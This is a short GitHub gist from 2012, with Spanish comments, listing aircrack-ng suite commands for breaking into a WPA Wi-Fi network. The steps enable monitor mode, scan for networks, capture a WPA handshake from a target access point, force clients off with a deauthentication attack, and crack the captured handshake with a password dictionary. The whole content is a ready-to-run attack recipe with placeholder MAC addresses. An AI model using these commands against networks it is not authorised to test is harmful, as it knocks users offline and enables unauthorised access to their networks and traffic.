Created
January 13, 2012 01:33
-
-
Save anabelle/1604160 to your computer and use it in GitHub Desktop.
Aircrack suite steps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# iniciar monitor | |
sudo airmon-ng start wlan0 | |
# ver redes | |
sudo airodump-ng mon0 | |
# Obtener handshake (reemplazar canal y MAC | |
sudo airodump-ng -c 3 -w wpa --bssid 00:00:00:00:00:00 mon0 | |
# Forzar handsahake | |
sudo aireplay-ng -0 5 -a 00:00:00:00:00:00 mon0 | |
# Verificar si tenemos algo | |
aircrack-ng wpa-01.cap | |
# Correr aircrack con un diccionario | |
aircrack-ng wpa-01.cap -w password.lst |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment